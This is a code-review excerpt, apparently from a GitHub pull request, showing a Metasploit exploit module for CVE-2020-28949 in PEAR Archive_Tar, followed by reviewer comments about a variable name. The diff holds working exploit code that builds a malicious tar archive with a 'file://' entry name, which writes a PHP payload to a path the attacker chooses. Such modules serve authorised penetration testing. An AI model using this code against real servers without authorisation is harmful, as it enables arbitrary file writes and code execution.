modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb

```diff
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/tar'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PEAR Archive_Tar < 1.4.11 Arbitary File Write',
+        'Description' => %q{
+          This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained
+          within filenames to write an arbitrary file containing user controlled content to an arbitrary file
+          on disk. Note that the file will be written to disk with the permissions of the user that PHP is
+          running as, so it may not be possible to overwrite some files if the PHP user is not appropriately
+          privileged.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'gwillcox-r7', # Metasploit module
+            'xorathustra', # Original advisory and PoC
+          ],
+        'References' =>
+          [
+            ['URL', 'https://github.com/pear/Archive_Tar/issues/33'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],
+            ['CVE', '2020-28949']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+            'DisablePayloadHandler' => true
+          },
+        'Platform' => ['php'],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            ['Archive_Tar < 1.4.11', {}]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-11-17'
+      )
+    )
+
+    register_options([
+      OptString.new('FILEPATH', [true, 'The full path to the file to write on the target.', '/tmp/msf.php'])
+    ])
+  end
+
+  def exploit
+    # Create malicious tar archive
+    tarfile = StringIO.new
+    Rex::Tar::Writer.new tarfile do |tar|
+      tar.add_file "file://#{datastore['FILEPATH']}", 0o644 do |io|
+        io.write payload.encoded
+      end
+    end
+    tarfile.rewind
+    cbt = tarfile.read
```

Comment:
What does `cbt` represent? It's not immediately clear 👀 

Google suggests it stands for `comic book tarfile`? Or is that just a coincidence 😄

Reply:
Woops I copied some of this code from another module. I believe this stands for `count bytes total`, but I'm happy to rename this as I agree this is not the best of names.

Reply:
Changed this to be `file_buffer` instead which should hopefully make more sense.